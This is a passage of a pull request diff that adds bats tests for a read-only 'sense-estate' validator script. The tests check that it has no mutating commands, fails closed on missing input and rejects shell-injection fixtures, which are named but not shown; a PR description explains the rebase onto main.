+  --json) printf '{"mode":{"default":"query","ok":true},"coverage":{"indexed":142,"phantoms":[]},"unstamped_recent":[],"freshness_min":10}\n' ;;
+  *)      printf 'ok|mode=query · 0 unstamped | 0 phantom · 142 cols|indexed ↔ surfaced\n' ;;
+esac

--- a/tests/sense-estate.bats
+++ b/tests/sense-estate.bats
@@ -1,0 +1,167 @@
+#!/usr/bin/env bats
+# =============================================================================
+# sense-estate.bats — tests for the GECKO sense-estate doctor (Wave A).
+#
+# Covers:
+#   - sense-only grep-gate: the skill carries NO act/mutation verbs
+#   - the estates validator runs against the good example
+#   - the validator REJECTS every injection fixture (→ blind, exit 3)
+#   - the tile is exactly 3 fields after a raw | is escaped
+#   - blind (exit 3, valid tile) on an absent probe
+#   - construct.yaml registers the skill + command under both keys
+#   - construct.yaml declares NO workflow.gates (sense-only)
+# =============================================================================
+
+setup() {
+  REPO="$(cd "$(dirname "$BATS_TEST_FILENAME")/.." && pwd)"
+  RES="$REPO/skills/sense-estate/resources"
+  VALIDATE="$RES/validate-estates.sh"
+  FIX="$REPO/tests/fixtures"
+
+  # materialize fixtures into a tmpdir with FIXTURE_DIR resolved + probe copied
+  TMP="$(mktemp -d)"
+  cp "$FIX/probe-ok.sh" "$TMP/probe-ok.sh"
+  chmod +x "$TMP/probe-ok.sh"
+  sed "s#PLACEHOLDER_FIXTURE_DIR#$TMP#g" "$FIX/estates.good.yaml"      > "$TMP/estates.good.yaml"
+  sed "s#PLACEHOLDER_FIXTURE_DIR#$TMP#g" "$FIX/estates.injection.yaml" > "$TMP/estates.injection.yaml"
+}
+
+teardown() {
+  [[ -n "${TMP:-}" && -d "$TMP" ]] && rm -rf "$TMP"
+}
+
+# ---- a tile MUST be exactly 3 pipe-delimited fields -------------------------
+assert_three_fields() {
+  local line="$1"
+  local n
+  n=$(awk -F'|' '{print NF}' <<<"$line")
+  [ "$n" -eq 3 ]
+}
+
+@test "sense-only: the resolver EXECUTABLE invokes no act/mutation verbs" {
+  # The executable is the only place that could ACT. The docs legitimately NAME
+  # the forbidden verbs (to forbid them), so the grep-gate targets the script.
+  # Match command/execution shapes, not prose.
+  run grep -nE '(br[[:space:]]+(update|close)|gh[[:space:]]+pr[[:space:]]+(create|merge)|recall-stamp\.sh[[:space:]]+apply|align\.mjs[^[:space:]]*[[:space:]]+--apply|--confirm)' \
+    "$VALIDATE"
+  # grep exits non-zero when NOTHING matches — that is the pass condition.
+  [ "$status" -ne 0 ]
+}
+
+@test "sense-only: the resolver never uses bash eval as a command" {
+  # command-position eval only (start-of-line or after ;/&&/|), not comments or
+  # the --eval flag-rejection token.
+  run grep -nE '(^|[;&|][[:space:]]*|[[:space:]]then[[:space:]]|[[:space:]]do[[:space:]])eval[[:space:]]' "$VALIDATE"
+  [ "$status" -ne 0 ]
+}
+
+@test "sense-only: SKILL.md states the no-act constraint explicitly" {
+  # The doc MUST carry the sense-only boundary (positive assertion).
+  run grep -niE 'sense-only|zero act' "$REPO/skills/sense-estate/SKILL.md"
+  [ "$status" -eq 0 ]
+}
+
+@test "construct.yaml registers sense-estate under skills: and commands:" {
+  run yq -r '.skills[].slug' "$REPO/construct.yaml"
+  [[ "$output" == *"sense-estate"* ]]
+  run yq -r '.commands[].name' "$REPO/construct.yaml"
+  [[ "$output" == *"sense-estate"* ]]
+}
+
+@test "construct.yaml declares NO workflow.gates (sense-only)" {
+  run yq -r '.workflow.gates // "none"' "$REPO/construct.yaml"
+  [ "$output" == "none" ]
+}
+
+@test "validator resolves a good estate and runs the probe read-only" {
+  run env LOA_ESTATES_FILE="$TMP/estates.good.yaml" bash "$VALIDATE" echotest
+  [ "$status" -eq 0 ]
+  # the probe printed a JSON receipt
+  [[ "$output" == *'"mode"'* ]]
+}
+
+@test "validator --argv prints the validated argv as a JSON array (no exec)" {
+  run env LOA_ESTATES_FILE="$TMP/estates.good.yaml" bash "$VALIDATE" --argv echotest
+  [ "$status" -eq 0 ]
+  # argv[0] is bash, argv[1] is the resolved (token-expanded) absolute script path
+  run jq -r '.[0]' <<<"$output"
+  [ "$output" == "bash" ]
+}
+
+@test "blind (exit 3, valid 3-field tile) on an absent probe script" {
+  run env LOA_ESTATES_FILE="$TMP/estates.good.yaml" bash "$VALIDATE" absent
+  [ "$status" -eq 3 ]
+  [[ "$output" == blind\|* ]]
+  assert_three_fields "$output"
+}
+
+@test "blind on an unknown slug" {
+  run env LOA_ESTATES_FILE="$TMP/estates.good.yaml" bash "$VALIDATE" nosuchslug
+  [ "$status" -eq 3 ]
+  [[ "$output" == blind\|* ]]
+  assert_three_fields "$output"
+}
+
+@test "blind on an absent estates.yaml (fail-closed, not crash)" {
+  run env LOA_ESTATES_FILE="$TMP/does-not-exist.yaml" bash "$VALIDATE" echotest
+  [ "$status" -eq 3 ]
+  [[ "$output" == blind\|* ]]
+  assert_three_fields "$output"
+}
+
+# ---- the injection fixtures: EVERY one must be rejected to a blind tile ------
+@test "injection: metacharacter command-chaining is rejected" {
+  run env LOA_ESTATES_FILE="$TMP/estates.injection.yaml" bash "$VALIDATE" metachar
+  [ "$status" -eq 3 ]
+  assert_three_fields "$output"
+}
+
+@test "injection: bash -c inline-eval is rejected" {
+  run env LOA_ESTATES_FILE="$TMP/estates.injection.yaml" bash "$VALIDATE" evalsmuggle
+  [ "$status" -eq 3 ]
+  assert_three_fields "$output"
+}
+
+@test "injection: node -e inline-eval is rejected" {
+  run env LOA_ESTATES_FILE="$TMP/estates.injection.yaml" bash "$VALIDATE" nodeeval
+  [ "$status" -eq 3 ]
+  assert_three_fields "$output"
+}
+
+@test "injection: a STRING command (not argv array) is rejected" {
+  run env LOA_ESTATES_FILE="$TMP/estates.injection.yaml" bash "$VALIDATE" stringcmd
+  [ "$status" -eq 3 ]
+  assert_three_fields "$output"
+}
+
+@test "injection: a non-allowlisted interpreter is rejected" {
+  run env LOA_ESTATES_FILE="$TMP/estates.injection.yaml" bash "$VALIDATE" badbin
+  [ "$status" -eq 3 ]
+  assert_three_fields "$output"
+}
+
+@test "injection: command-substitution token is rejected" {
+  run env LOA_ESTATES_FILE="$TMP/estates.injection.yaml" bash "$VALIDATE" cmdsub
+  [ "$status" -eq 3 ]
+  assert_three_fields "$output"
+}
+
+# ---- tile robustness: a raw | in a probe's output is escaped to 3 fields -----
+@test "tile: a raw | in SIGNAL is escaped so the line splits to exactly 3 fields" {
+  # probe-ok.sh (no --json) prints a tile whose SIGNAL contains a raw '|'.
+  # Apply the skill's documented escape (tr '|' ' ' on SIGNAL/MISMATCH) and
+  # assert the consumer split yields exactly 3 fields.
+  raw="$("$TMP/probe-ok.sh")"
+  # raw deliberately has >3 fields (an unescaped pipe in SIGNAL)
+  rawn=$(awk -F'|' '{print NF}' <<<"$raw")
+  [ "$rawn" -gt 3 ]
+  # the doctor's escape: keep STATUS, collapse the rest, escaping inner pipes
+  status_field="${raw%%|*}"
+  rest="${raw#*|}"
+  signal="${rest%%|*}"
+  mismatch="${rest#*|}"
+  signal_esc="$(tr '|' ' ' <<<"$signal")"
+  mismatch_esc="$(tr '|' ' ' <<<"$mismatch")"
+  tile="$status_field|$signal_esc|$mismatch_esc"
+  assert_three_fields "$tile"
+}


### PR DESCRIPTION
Re-targets the **sense-estate doctor** onto `main`. It merged to `tend/cycle-002` via #9, but `tend/cycle-002` is squash-divergent from `main` (a whole-branch merge conflicts) — so this is the clean path: just the doctor, rebased onto `main`.

**Why:** makes the gecko pack install `sense-estate`, so `construct-compositions#16`'s `immune-relay-{recall,beads}` can resolve `gecko:sense-estate` and the live `/compose` dogfood closes.

**What:**
- the full sense-estate doctor (SKILL + command + resources + tests) — identical to #9
- `construct.yaml` resolved as **UNION**: `main`'s `sweep-bonfire` + the doctor's `sense-estate` (siblings, each added a different skill); description five→six
- **17/17 bats green**: sense-only (no act verbs, no `workflow.gates`), fail-closed blind (absent probe / unknown slug / absent config), full injection-rejection battery (`bash -c`, `node -e`, string-not-argv, non-allowlisted, command-substitution), delimiter-escape

Doctor-first immune-relay; act-skills (`construct-the-immune`) remain deferred.